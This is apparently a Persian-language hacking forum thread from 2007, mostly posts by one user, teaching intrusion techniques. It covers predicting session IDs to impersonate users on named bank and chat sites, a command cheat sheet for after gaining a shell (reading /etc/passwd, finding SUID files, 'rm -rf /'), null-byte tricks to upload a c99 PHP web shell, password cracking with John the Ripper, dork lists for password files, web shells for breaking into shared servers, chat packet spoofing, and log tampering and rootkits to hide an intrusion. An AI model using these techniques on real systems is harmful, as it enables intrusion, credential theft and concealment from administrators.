http://www.xyzbank.com/showbil.asp?sessionID=1028 (http://www.xyzbank.com/showbil.asp?sessionID=1028)

اين نشانه هاي مي تواند در بانك اطلاعاتي سمت سرور به صورت زير ذخيره گردد: aaa




Account Number

Admin

Username

Index

….

….

….

….

All

Y

Hosseini

1025

087

N

Madadi

1026

545

N

Amiri

1027

784

N

Alizade

1028

452

N

Sharifi

1029
….
….
….
….


براي اينكه آقاي اميري بخواهد خودش را جاي آقاي عليزاده بزند كافي است كه SessionID خودش را به SessionID آقاي عليزاده تغيير دهد يعني لينك زير را ارسال كند:


http://www.xyzbank.com/showbil.asp?sessionID=1028 (http://www.xyzbank.com/showbil.asp?sessionID=1028)

باز هم مي بينيم كه طلاعات ذخيره شده در سمت سرور هم نمي تواند ما را در برابر جعل هويت مصون كند.
در قسمت اول دلايل استفاده از نشست ها و همچنين دسته بندي از آنها بيان كرديم. در اين مقاله يك مثال عملي آورده ايم و نحوه مقابله با اينگونه حملات نيز بيان شده است.
يك مثال واقعي
حتما خيلي از شما تا به حال به سايت www.iranianchat.com (http://www.iranianchat.com/) رفته ايد وقتي وارد اتاق گفتگو مي شويد برنامه كاربردي سايت يك chatID به شما مي دهد و هر بار كه شما پيغامي ارسال مي كنيد پيغام شما به همراه يان chatID كه نمايانگر شما مي باشد براي برنامه كاربردي ارسال مي گردد و اين برنامه از طرف شما اطلاعات زير را ذخيره كرده است :
chatID = 3087.2
Name = "Kalantar"
Color = "#b2b2b2
Msg = Your Message
حال وقتي پيغامي به همراه ChatID شما براي برنامه كاربردي سايت ارسال مي شود اين برنامه اين پيغام را از طرف شما و با نام شما در اتاق گفتگو مي نويسد.
حال وقتي يك نگاه ساده به ChatID هاي داده شده توسط برنامه كاربردي وب بياندازيم مي بينيم كه آنها شباهتي با هم دارند و روي يك الگوريتم خاصي به كاربران داده مي شود:

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3087.2
k1 omad 5/9/2004 12:51:27 AM (213.17.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3091.507
k2 omad 5/9/2004 12:51:31 AM (213.17.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3095.512
k3 omad 5/9/2004 12:51:35 AM (213.7.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3107.239
k4 omad 5/9/2004 12:51:47 AM (213.7.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3111.235
k5 omad 5/9/2004 12:51:51 AM (213.17.8.4)

http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3116.242
k6 omad 5/9/2004 12:51:56 AM (213.17.8.4)

با جمع آوري اعداد و ارقام به دست آمده و آمارگيري آنها الگوريتم به كار رفته براي ساختن نشانه نشست به دست مي آيد:

12:51:31 - 12:51:27 = 00:00:04 ==> 3091-3087 = 4
12:51:35 - 12:51:31 = 00:00:04 ==> 3095 - 3091= 4
12:51:47 - 12:51:35 = 00:00:12 ==> 3107 - 3095= 12

الگوريتمي كه برنامه نويس سايت (RoyaAz ) براي مديريت نشست ها به كار برده است به صورت زير مي باشد:

ChatID = Num1.Num2
OldNum1 = Num1 براي آخرين نفر
Num1 = (زمان ورود آخرين نفر – زمان ورود شخص ) OldNum1
Num2 = يك عدد تصادفي بين 0 تا 999

به عنوان مثال عملي تر ، فرض كنيد پس از نفر K6 آقاي X وارد مي شود كه اطلاعات آن به صورت زير مي باشد :
............................................................ ...........
k6 omad 5/9/2004 12:51:56 AM (213.17.8.4)
K6 : Salammmmm
K6 :
X omad 5/9/2004 12:52:16 AM (10.7.28.157)
X : Hi !
X: Salam K6
............................................................ ............

در اين هنگام K6 نگاهي به ChatID خود مي كند و نگاهي به زماني كه وارد شده است. اطلاعات آن به صورت زير مي باشد :

ChatID = 3116.242
Time = 12:51:56

و از زماني كه آقاي X وارد شده اند ( 12:52:16 ) مي تواند به راحتي قسمت اول نشست را پيدا كند يعني ChatID آقاي X به صورت زير مي باشد :

12:51:56 - 12:52:16 = 20
ChatID = 3116 20 = 3136

pastoo
29-01-2007, 07:39
سلام به همه
این دستورات برای زمانی که از یه جایی shell گرفتید بدرد میخوره (linux cmd line)


cat ./../mainfile.php - Config file.
ls -la - Lists directory's.
ifconfig {eth0 etc} - Ipconfig equiv.
ps aux - Show running proccess's.
gcc in_file -o out_file - Compile c file.
cat /etc/passwd - List's accounts.

cat /home/user/public_html test /? >c:\test.txt
(I use this if using a remote code execution exploit) has been tested loads of times works fine.
sudo - Unsure.id - Tells you what user your logged in as.
which wget curl w3m lynx - Check's to see what downloaders are present.
uname -r - Shows all release info (or) cat /etc/release.
uname -a - Shows all kernal info (or) cat /etc/issue
last -30 - Last logged 30 ip's can change to desired number.
useradd - Create new user account.
usermod - Modify user account.
w - See who is currently logged on.
locate password.txt - Locates password.txt in current dur can use *.
rm -rf / - Please be carefull with this command, i cannot stress this enough.
arp -a - Whos on same subnet.
lsattr -va - ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls - Finds suid files.
find . -type f -perm -04000 -ls - Finds suid files in current dir.
find / -type f -perm -02000 -ls - Finds all sgid files.
find / -perm -2 -ls - Finds all writable files and folders.
find . -perm -2 -ls - Finds all writable files and folders in current dir.
find / -type f -name .bash_history - Finds bash history.
netstat -an | grep -i listen - shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo - Cpu info.
locate gcc- Finds gcc if installed.
set - Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf - Log file.
uptime - Uptime check.
cat /proc/meminfo - Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null - Find writable files.
chmod ### $folder - Chmod folder.
ls -l -b - Verbosly list directory's[/code

pastoo
31-01-2007, 12:39
تاحالا شده بخواهین php shell رو یه جا upload کنید ولی سایت نزاره ؟؟؟

null charatcter یا null byte یا null terminator کاراکتر های بی ارزشی هستند که همه چیز را در مد ASCII نشان میدهند
در زبان های برنامه نویسی (php included) از این کاراکتر ها میشه استفاده کرد
این کاراکتر های بی ارزش به شکل %00 در php استفاده میشود
با این کاراکتر های بی ارزش ما میتونیم php shell ها رو در picture hosting یا سایت هایی که اجازه upload عکس را میدهند upload کنیم . تو گوگل میتونید search کنید upload image یا picture hosting تا این سایت ها رو پیدا کنید
حالا چطوری میشه با این روش php shell رو روی سرور upload کرد ؟؟؟؟
تو سایت هایی که اجازه upload میدهند کلیدی به نام Browse هست که باید عکس رو بهش معرفی کنید تا upload کنه ، اول shell رو بهش بدید و upload کنید و میبینید که error به شکل زیر میده :
"We're sorry, but the file you entered is using an extension that is not alloud. Images only
please!"
error کاملا منطقی هست چون سایت فقط اجازه upload عکس رو میده ، برای اینکه sell رو upload کنید باید فیلتری که فقط اجازه upload عکس رو میده دور بزنید و این کار رو با استفاده از null byte انجام میدیم
یه بار دیگه Browse رو بزنید ولی این با آدرس رو به شکل زیر تغییر بدید:
c:\c99.php%00.jpg
و وقتی upload بزنید میبینید که بدون هیچ مشکلی upload میشه و یه پیغامی تو مایه زیر میده :
"Thank you for uploading your pictures - view your file at /c99.php"

برای پیدا کردن نمونه ای از این null byte ها میتونید به سایت زیر مراجعه کنید ولی بهتر از این گوگل است
http://en.wikipedia.org/wiki/Null_character (http://en.wikipedia.org/wiki/Null_character)
بازم میگم این null byte که من معرفی کردم شاید قدیمی شده باشه و رو هر سایتی جواب نده ولی اگر بگردید و جدید ترین null byte ها رو پیدا کنید میتونید یه کارایی بکنید


اینایی که گفتم برای سایت هایی بود که با php نوشته شده بود یا فیلتر upload شون با php بود ، حالا برای سایت های cgi میخوام توضیح بدم
این مثال یک صفحه cgi هست که میخواهیم باهاش به یه صفحه دیگه که .html هست دسترسی پیدا کنیم
index.cgi?pageid=3
این کد اجازه میده صفحه ای با نام 3.html باز بشه ، این یه bug نیست ولی اگر از null byte استفاده بشه .....
طریقه استفاده از null byte برای این نوع صفحه ها به این شکله :
index.cgi?pageid=index.cgi%00
برای دسترسی به پسوورد های سایت باید کد رو به شکل زیر بنویسم ( البته این یکی رو خودم تست نکردم ولی فکر کنم اگه اینجوری وارد بشه جواب میده ):
index.cgi?pageid=/ect/passwd%00
اگر این کد جواب داد که خوش بحالتون ، پسوورد های سایت رو دارین ، برید حال کنید

pastoo
31-01-2007, 12:43
آموزش برنامه john
-------------------------------
این از این خوب الان در باره JOHN THE RIPPER توضیح میدم

این برنامه یه کرکر از نوع BRUTE FORCE هستش و برای کرک پسورد های کد شده است

این برنامه تحت داس عمل میکنه یعنی ما باید اونو تو داس اجرا کنیم از همون ا که JOHN THE RIPPER

رو نصب کردیم پس اول تو داس میریم MENU START=>RUN=>CMD

حالا میزنیم

C:\JOHN.EXE

به داخل اون شاخه میریم و میزنیم

C:\JOHN.EXE -I:ALL C:\SMARTCRACK.TXT

برای انتخاب نوع سرچ کردن برنامه از این گزینه ها استفاده میکنیمI-:SMARTCRACK

اگه ما جای SMARTCRACK قرار دهیم

ALL:همه کارکترها DIGITS:فقط شماره ها ALPHA: فقط حروف

برای مشاهده گزینه ها و امکانات برنامه از JOHN.EXE استفاده میکنیم

توجه داشته باشید که SMARTCRACK.TXT همون فایلی هست که ما از طریق WEB BROWSER

'گرفتیم یعنی ECT/PASSWD

وقتی ما فرمان بالا را اجرا کنیم برنامه شروع به حدس زدن رمز پسورد میکنه تا رمز کد شده را پیدا کنه تا زمانی

رمز پیدا بشه اگه خواستید از برنامه ای که در محیط داس در حال اجراست خارج بشید کلید ESC رو بزن راحت میشی



این عباراتی که با سرچ انها در گوگل متوانید فایل پسورد پیدا کنید
البته کتاب گوگل هکینگ در سایت هست ولی این اماده شده است
-----------------------


Password Hacking

filetype:htpasswd htpasswd
intitle:"Index of” “.htpasswd” -intitle:"dist” -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurl:passlist.txt (para encontrar listas de passwords)
intitle:"Index of..etc” passwd
intitle:admin intitle:login
“Incorrect syntax near” (SQL script error)
intitle:"the page cannot be found” inetmgr (debilidad en IIS4)
intitle:index.of ws_ftp.ini
“Supplied arguments is not a valid PostgreSQL result” (possible debilidad SQL)
_vti_pvt password intitle:index.of (Frontpage)
inurl:backup intitle:index.of inurl:admin
“Index of /backup”
index.of.password
index.of.winnt

inurl:"auth_user_file.txt”
“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
Index of /” +.htaccess
Index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt”
inurl:"wwwroot/*.”
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of” .sh_history
intitle:"Index of” .bash_history
intitle:"Index of” passwd
intitle:"Index of” people.1st
intitle:"Index of” pwd.db
intitle:"Index of” etc/shadow
intitle:"Index of” spwd
intitle:"Index of” master.passwd
intitle:"Index of” htpasswd
intitle:"Index of” members OR accounts
intitle:"Index of” user_carts OR user _cart



--------------------------------------------------------------------------------

ّFind Ftp Server

inurl:"ftp." index.of


--------------------------------------------------------------------------------

Using Google as a CGI Scanner

inurl:cgi-bin/cgiemail/uargg.txt
inurl:random_banner/index.cgi
inurl:random_banner/index.cgi
inurl:cgi-bin/mailview.cgi
inurl:cgi-bin/maillist.cgi
inurl:cgi-bin/userreg.cgi
inurl:iissamples/ISSamples/SQLQHit.asp
inurl:iissamples/ISSamples/SQLQHit.asp
inurl:SiteServer/admin/findvserver.asp
inurl:scripts/cphost.dll
inurl:cgi-bin/finger.cgi


--------------------------------------------------------------------------------

Awsome List for Rapidshare(هرآنچه می خواهید در رپید شرپیدا کنید )

All rapidshare.de Downloads:
/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.*+site%3Arapidshare.de

Apps Rapidshare.de Downloads:
/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=.cab+OR+.exe+OR+.rar+OR+.zip+site%3Arapidshare.d e&btnG=Search

Movies rapidshare.de Downloads:
/http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.Avi+OR+.mpg+OR+.mpeg+site%3Arapidshare.de&btnG=Search


--------------------------------------------------------------------------------

Find "Private" Emails...(پیدا کردن ایمیلهای مخفی در سایت ها )

inurl:"/cgi-bin/email.txt"
inurl:"/emails.txt
</SPAN>

pastoo
31-01-2007, 13:01
نويسنده: فرهاد کوشا (farhadkey (at) yahoo (dot) com)

مقدمه :

شاید تا به حال فکر می کردید که هک کردن یک سرور و نفوذ به آن کار بسیار دشواری است . شاید تا به حال می پنداشتید که کسانی که یک سرور و تمام سایتهای بر روی آن سرور را هک می کنند افرادی بسیار با هوش و فوق العاده دانا در زمینه کامپیوتر و امنیت هستند .
اما این طرر تفکر نهایتا بر می گردد به 1-2 سال پیش . از وقتی که سطح دانش عموم افراد بسیار بالا رفت و سایتهای امنیتی ایرانی کم کم مقالاتی را در این زمینه منتشر کردند و روی دست مقالات تئوری آراز صمدی زدند . در حال حاضر میبینیم که سخت ترین کاری که یک هکر برای هک کردن یک سرور انجام می دهد کامپایل کردن یک اکسپلویت است . هر چند در این بین افرادی هستند که از سواد بالایی برخوردار هستند اما باید این واقعیت را قبول کنیم که دیگر نه تنها یک سری از هکرها را باهوش و دانا نمی دانند شاید حتی به آنها و کارهایشان بخندند . البته هکرانی که از خودش هیچ چیز ندارند . امروزه بسیاری کد و اکسپلویت و برنامه آماده برای هک کردن وجود دارند که هکر ، تنها با وارد کردن آدرس سایت می تواند یک سایت را هک کند بدون اینکه کوچک ترین زحمتی به خود بدهد .
در این مقاله درباره یکی از تکنیکهای نفوذ به یک سرور به شما توضیح خواهیم داد . قسمت اول مقاله در حال حاضر در اختیار شماست که تنها به شل و نحوه استفاده و توضیحات آن می پردازد اما قسمت دوم مقاله در مورد کارهای به روز در استفاده از شل خواهد بود . در تمام این مقاله حالت ایده آل را در نظر بگیرید . یعنی فرض کنید بر روی یک سروری که از لحاظ امنیتی ضعیف است کار می کنیم .

توضيحات :

یکی از تکنیک ها برای هک کردن سایتهای یک سرور استفاده از فایل هایی است که بر روی یکی از سایت های سرور قرار داده می شود و به وسیله آن فایلها می توان به بقیه سایتهای سرور نیز نفوذ کرد . این فایلها اصطلاحا شل نامیده می شوند با پویش و امکان برگشت به عقب ( .. ) و دسترسی به فایلهای ریشه و سایر فایلهای سرور ، زمینه نفوذ به سرور را فراهم می سازند . این فایلها معمولا با PHP یا ASP نوشته می شوند که از معروف ترین آنها nstView است که با PHP و rhtools که با ASP نوشته شده است . این فایلها تمامی امکانات یک برنامه مدیریت فایل را دارا می باشند . همچنین امکان اجرا کردن Command نیز در این فایل ها وجود دارد .
اگر چند خط بالا کمی پیجیده بود چندان مهم نیست . از اصطلاحات صرف نظر کنید فقط بدانید که در دید مثبت می توان آن را یک FileManager برای سایت خود و دیگر سایت های سرور دانست و از دید هکر یک راه برای نفوذ . به طوریکه در توصیف nstview میخوانیم :
Very small script, to managmant your files on web server. Easy to run - http://your_web/nstview.php (http://your_web/nstview.php) , very easy to use
به طور مثال فرض کنید یکی از این فایل ها را (در اینجا rhtools ) بر روی سایت خود قرار داده و آن را اجرا کردید :



در مثال فرضی بالا فایل در لوکال هاست اجرا شده و سایتها در فولدر c:\inetpub\wwwroot\domains نگهداری می شوند .
اگر شل در مسیر فیزیکی c:\inetpub\wwwroot\domains\irannetjob.com\shell.asp قرار داشته باشد شما با برگشت به یک پوشه عقب قادر هستید اسامی سایتهای روی سرور را مشاهده کنید . سپس با وارد شدن به دایرکتوری (سایت مورد نظر) ، می توانید همانند مدیر آن سایت اعمال آپلود ، دانلود ، ویرایش و ... را انجام بدهید . حال دیگر فرقی نمی کند که مسیر شل شما کجا باشد . اگر c:\inetpub\wwwroot\domains\irannetjob.com\myfile\shell.asp باشد بدیهی است که برای رسیدن به پوشه ای که سایت ها در آنها قرار دارند باید دوبار به عقب برگردید . اما فراموش نکنید تمام این کارها زمانی مفید فایده خواهند بود که امنیت سرور پایین باشد و شما امکان برگشت به دایرکتوری بالاتر را به وسیله .. داشته باشید و دسترسی شما هم محدود نباشد . در غیر این صورت روش دیگری برای نفوذ به سرور انتخاب کنید .

برای دانلود فایلهای rhtools و یا nstview می توانید با کمی جستجو در گوگل این فایلها را پیدا کرده و به حالت فشرده این فایلها را دانلود کنید و اگر سایت شما php را ساپورت می کند از nstview و اگر asp ساپورت می کند از rhtools استفاده کنید . کار کردن با این فایل ها نیز بسیار آسان است و سعی شده تا جایی که امکان دارد از درگیر کردن مستقیم هکر با کد جلوگیری کند .

کليه حقوق اين اثر براي سايت ايران نت جاب و کانون پژوهشگران دانش امنيت محفوظ ميباشد.




این script بیشتر بدرد آن دسته از دوستانی که سایت دارند و از سرویس دهنده خود ناراضی هستند می خورد !! یا مثلا کسانی که خیلی پلید هستند و میروند یک فضای 5 MB اجاره میکنند و از آن به گونه ای سوء استفاده میکنند که کار یک فضای 50 MB را برای آنها انجام میدهد و....



ما فرض میکنیم که شما دسترسی به قربانی دارید مثلا یک FTP و .... خوب ما از یک script بسیار کوچک و ساده استفاده میکنیم !! اگر با زبان script نویسی و جزییات ان آشنایی ندارید نگران نباشید ، ما از مدل های آماده آن استفاده میکنیم ، خوب ما دو مدل script برای PHP و ASP به شما معرفی میکنیم ، یکی از بهترین script ها برای ASP اسکریپت rhtools است و برای PHP هم nstView است .



فقط کافی است که شما بنا به نیاز خود یکی از اینها را در پوشه سایت مورد نظر خود قرار بدهید و آدرس آن را در مرورگر اینترنت خود وارد کنید ، حال شما هم میتوانید خط فرمان سیستم و ... دسترسی داشته باشید .



البته مدل های CGI آن هم موجود است !! مثلا perl_shell.cgi و .... در ASP بیشتر ترجیح میدهم از cmdasp.asp استفاده کنم و در PHP هم از sys.php و برای سرویس دهنده های J2EE App Server هم از cmdexec.jsp و ....


اصولا به این اسکریپت ها Web Command Prompt میگویند و شما میتوانید برای اطلاعات بیشتر همین عبارت را از دکتر گوگل بپرسید !! البته آن دو تا فایلی که اول معرفی کردم هم یک آپلودر و هم یک خط فرمان و .... بودند . کارایی اینها هم که واضح است ، اگر یک دیوار آتش مزاحم شده به راحتی با این روش ساده آن را دور میزنید و ....




By: ZXO003

با يه سرچ تو گوگل ميتونيد scriptها رو پيدا کنيد:

http://www.kpdef8.com/rhtools (http://www.kpdef8.com/rhtools)




دوستان 1 چیزی بگم و برم شما شل های زیادی ممکنه پیدا کنین . نحوه کار اینه که شما بیاین این شل ها را 1 جا upload کنین و سپس از دستورات آن در انتهای آدرس قربانی استفاده کنید
از توضیحات بیشتر معذوزم

pastoo
09-02-2007, 11:03
DigiChat يكي از نرم افزارهاي قدرتمند(Writed By Java) براي چت مي باشد كه همچون IRC
افراد مي توانند داخل آن قرار بگيرند و با يكديگر صحبت كنند.
يكي از باگهاي DigiChat صحبت كردن به جاي افراد ديگر -ساختن روم هاي غير مجاز و.... مي باشد.
هم اكنون يكي از راه هاي نفوذ به DigiChat را بررسي مي كنيم.
اميدوارم با شروع اين بحث راه كارهائي براي حل اين مشكل پيدا كنيم.

http://i11.tinypic.com/4858bbd.jpg

در عكس بالا محيط DigiChat نمايان است.
هر ارتباطي در DigiChat داراي يك سوكت مخصوص به خود است.
مي توان اين شماره سوكت رو به وسيله ي يك Packet Sniffer همچون WPE بدست آورد.

http://i14.tinypic.com/450860m.jpg
بعد از بدست آوردن شماره ي سوكت مي توان با تغيير دادن Packet كارهاي جالبي كرد.

http://i17.tinypic.com/352neqr.jpg

اگر بخواهيم به جاي تمام user ها صحبت كنيم كافيست room ID را به ox00 تغيير دهيم.
و Packet را ارسال كنيم و نتيجه

http://i12.tinypic.com/2luw7xy.jpg

و كارهاي جالب ديگري كه با نصب DigiChat بر روي pc خودتون مي توانيد آن ها را امتحان كنيد.

به نظر شما چگونه مي توان جلوي فرستادن Packet را به تمام كاربران گرفت؟؟

pastoo
09-02-2007, 23:51
اول از همه بگم دست شاهین گل درد نکنه با ترفند جالبی که اعلام کردند اینجا داشته باشید


خوب با نام او اینبار براتون یه درس تصویری درست کردم ۱۲ دقیقست من در کنار آموزش برنامه نویسی

تو Visual Basic براتون گداشتم به راحتی میتونید تو C و Perl و Python هم اجرا کنید .........
اگه سوتی داره شرمندا ساعت رو پایین ویدو ببنید 4.30 صبح .....
این درس تصویری رو اینگیلیسی ساختم اما ترجمش هم تو PDF همراه فایل گذاشتم .....
خوب درس تصویری رو ببنید و بعد نظر بدید ......
موفق باشید ...http://vampires.persiangig.com/FakeFTP.rar
حجم 1.2 مگ ......
موفق باشید !!!!

pastoo
10-02-2007, 23:34
مقاله ایی برای نوشتن شل کد اینجا بهتون معرفی میکنم امیدوارم مفید باشه

http://kouros.persiangig.com/Shabgard/writing%20shellcode.pdf


سوالی بود در خدمتم

pastoo
10-02-2007, 23:44
مقاله جامع سیستم های کشف نفوذگری نسخه دوم
IDS II Journal
در این مقاله این سیستم ها کاملا توضیح داده شوده
انواع کلی IDs
خصوصیات و مزایا و معایب کلی
چگونگی نصب در شبکه
چگونگی طراحی توپولوژی با استفاده از IDS
چگونگی دور زدن IDS
و ...
نویسندگان:Satanic Soulful , Iman Emperor
کپی رایت برای تیم های : شبگرد و امپراطور و جهنم شیطانی
فایل pdf میباشد و با arobat reader باز میشود
Size:1.12Mb
Download (http://satanichell.persiangig.com/journal/IDS%20II.rar)

pastoo
16-02-2007, 00:53
برنامه اي براي جستجوي سايت هاي باگ دار در google




http://takfanar.persiangig.com/Cracked/myf/pic/Sabgardgoogleh4cker1.GIF


همین طور که میبینین کار بچه های گل shabgard هست

دانلود (http://takfanar.persiangig.com/Crack...ker%20Beta.zip)

موفق باشید

pastoo
16-02-2007, 01:14
یه آموزش سریع

www.metasploit.com (http://www.metasploit.com/)

بعد از نصب برنامه فایل msfconsole را اجرا کنید تا پرامپت متااسپلویت و ببینید.
همکنون ما در مود اصلی هستیم (main Mode) و میتوانید با زدن دستور help تمام دستورات قابل اجرا را مشاهده کنید.
با وارد کردن دستور show exploits میتوانید لیست اکسپلویت های موجود را ببینید. و یا برای دیدن جزئییات هر اکسپلویت از دستور( show modul_name) استفاده کنید.

انتخاب اکسپلویت:

برای انتخاب اکسپلویت از دستور use و برای خارج شدن ار این حالت از back استفاده کنید.
برای استفاده از هر ماژول اکسپلویت احتیاج به تنظیم Option های آن میباشد ..برای دیدن این آپشن ها ار دستور show options استفاده کنید.(دقت کنید . ابتدا اکسپلویت مورد نظر را انتخاب کرده و بعد میتوان option های آن را تغییر دهید.
آپشن های کاربردی:

RHOST: از این آپشن برای تنظیم آدرس هدف استفاده میشود
RPORT: از این آپشن برای تنظیم پورت مورد نظر بر روی هدف استفاده میشود.
LHOST: تنظیم آدرس شخصی
LPORT: برای تنظیم آدرس پورت شخصی
PAYLOAD: پی لود نوع دستوراتی را مشخص میکند که بعد از این که هدف با موفقیت exploit شد. بر روی هدف اجرا میشود. برای دیدن لیست این پی لود ها از دستور show payloads استفاده کنید.
TARGET : نوع برنامه ای را که قرار است exploit شود مشخص میکند. برای دیدن اهداف از دستور show targets استفاده کنید.
برای ست کردن هر کدام ار این option ها از دستور set استفاده کنید.
در انتها برای اجرای اکسپلویت ار دستور exploit استفاده کنید.
نکته: حتما دقت کنید که برای option ها از حروف بزرگ استفاده شود.

pastoo
19-02-2007, 23:09
مدرک Ethical hacking certificate یا به اختصار CEH یکی از جامع ترین و شاید زیباترین مدارک نفوذگری در سطح بین المللی است.
در این جا کتاب کامل »
Ethical Hacking and Countermeasures به صورت CHM همراه با تمامی شکل ها و توضیحات ارائه میگردد:

ECEH-becomes-the-fastest-gr.gif (http://www.eccouncil.org/images2/ECEH-becomes-the-fastest-gr.gif)

در این کتاب میخوانید :

http://www.eccouncil.org/EC-Council%20Education/ceh-course-outline.htm (http://www.eccouncil.org/EC-Council%20Education/ceh-course-outline.htm)

حجم کتاب 14.5 مگابایت .
به صورت انگلیسی روان همراه عکس هایی برای توضیح


لینک دانلود را از اینجا (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=306)بگیرید


منبع : سیمرغ

pastoo
20-02-2007, 16:00
خوب پاک کردن ردپا در سیستم عامل های سازگار با یونیکس مثل لینوکس . ( البته یکمم درباره اواع سولاریس میگم تا حد توان )
فایل های ثبت رخداد در سیسته عامل های سازگار با یونیکس به صورت فایل های متنی ساده ASCII ذخیره میشود . بهترین راه این است که ما پیکر بندی فایل syslogd به گونه مورد نظر خود تغییر بدیم تا موارد مشکوک ذخیره نشوند .( می توانیم این فایل ها را با یک ویرایشگر ساده مانند Vi و emacs ویرایش کنیم . ) البته تکرار میکنم نه همه آنها . ( البته کار غیر معقولانه تر اینه که بعضی ها با ین سکریپت های آماده این کارو انجام میدن مثل اسکریپت بالا ( البته کسی ناراحت نشه ها ) اینا دو بدی دارن .
1: بیشتر این اسکریپت ها کل این فایل رو ویرایش میکنن وا ین یعنی .......
2: خودشون رد پا میزارن و یه مدیر باهوش سریعا میفهمه .

تغییر پیکر بندی syslogd:
این فایل syslog.conf مشخص کننده پیکر بندی برنامه syslogd است و به این برنامه میگوید که در کجا و کدام فایل رخدادهای اتفاق افتاده را ثبت کند . در مرحله اول ما باید دارای مجوز root شویم و این فایل را یک نگاهی بندازیم و ببینیم کجاهای این فایل مربوط به ما و کارهای ماست بعد اونارو پاک یا ویرایش کنیم . و به فایل syslog.conf رفته و آن را ویرایش کنیم تا اعمالی که ما میخوایم انجام بدیم رو ثبت نکنه البته باید در آخر کار تنظیماتو به تنظیمات اولیه برگردونیم . ( این آخری خیلی خبیثانه بود نه ؟؟؟ )
این مطمئن ترین راهه .
خوب حالا نکات مهم در پیکر بندی syslog.conf :
1:در اکثر سیستم های لینوکس پیام های ثبت رخداد توسط syslog.conf به /var/log/messages هدایت میشه و البته در سولاریس var/adm/log/messages ( که البته میتونه توسط ادمین عوض شه )( بعد میگن سولاریس از لینوکس کپی نزده ... )

2:در اکثر این فایل ها دستور زیر وجود داره :

Auth.info /vear/log/auth.log

که در واقع این دستور تلاش های صورت گرفته برای لاگین و یا استفاده از دستور Su و یا استفاده از reboot و دیگر وقایع مرتیط با امنیت را جمع آوری میکنه شما برای دست کاری فایل ثبت رخداد اینجور وقایع باید به زیر شاخه /vear/log رفته و فایل auth.log را ویرایش کنید .

نکته تستی : ( اینقدر برا کنکور خونذیم موخمون گوزیده ) کلا پوشه /vear در اکثر اوقات مربوط به ویرایش فایل های ثبت رخداد است .


touch/var/log.auth.log
chown root /var/loglauth.log
chmod 600 / var/loglauth.log


و در سولاریس :


touch /var/adm/loginlog
chmod600 /var/adm/loginlog
chown root /var/adm/loginlog
chgrp sys /var/adm/loginlog


نکته تستی : 100% در کنکور : لینوکس با فایل هایی که با (.) شروع میشن مشکل داره و آنها رو با ذستور ls نشون نمیده و با ls -a نشون میده ( گرفتید برا چی میگم که ایم پوشه var رو بزارین ... و یک space هم آخرش ..... حالا هکره خودشو پاره کنه تا وارده این فولدر بشه )

فایل پیکر بندی اصلی ما در در /etc/syslogd.conf قرار دارد .

راه حل تستی : ( این راهیه که معلم خصوصی ها 100 تومن میگیرن میدن ) سیستم رو با یک root kit مثل Knark یا Adore یا ....... آلوده کنین . خودشون همه این کارا و چند تا کار اضافه ترم براتون میکنن . این یعنی آخره خفیّت ( توضیح الواضحات : خفیّت : مخفی بودن و ....... )

اما فایل های ثبت رخداد در اینگونه سیستم ها در /var/log قرار میگیرند که بعضی از آنها عبارتند از : /var/log/secure ( که رخداد های امنیتی در آن ذخیره میشود ) var/log/message ( پیام هایی همچون مولفه های سیستمی مثل دایمون . هسته و ..... .) var/log/httpd wtmp ( اینم مثل بالایی است ولی خروج ها هم ثبت میکنه ) /usr/adm/last log ( این فایل نام ماشین و زما ورود و خروج شما را ثبت میکند )

ابزار های مربوطه :
ابزار zap : این ابزار آخرین ورود ها را باز نویسی میکند و جای آن صفر میزارن .
ابزار Cloack 2 : این ابزاز داده های فایل ثبت رخداد را تغییر میدهد .
ابزار Clear : فایل های ثبت رخداد رو پاک میکنه .

pastoo
21-02-2007, 00:11
هنگامی كه اولین سیستم‌های كامپیوتری به صورت PC عرضه شدند و روی میز من و شما قرار گرفتند، كمتر كسی می‌توانست پیش‌بینی كند سیلاب اطلاعات با چنین حجم عظیمی شركت‌ها و حتی مردم دنیا را در نوردد. (http://www.academist.ir/) این دستگاه‌ها به انباره‌های ذخیره‌سازی كم‌ظرفیتی (نسبت به استانداردهای امروز) مجهز بودند، اما دپارتمان‌های IT خیلی زود توانستند با استفاده از سرورهای عمومی و انباره‌های اتصال مستقیم (كه از طریق یك اینترفیس پرسرعت SCSI به كامپیوتر متصل می‌شدند) پاسخگوی نیازهای اطلاعاتی آن زمان باشند. http://www.anisoftgroup.com/products/Products-ST-StorageNetworking_image.jpg
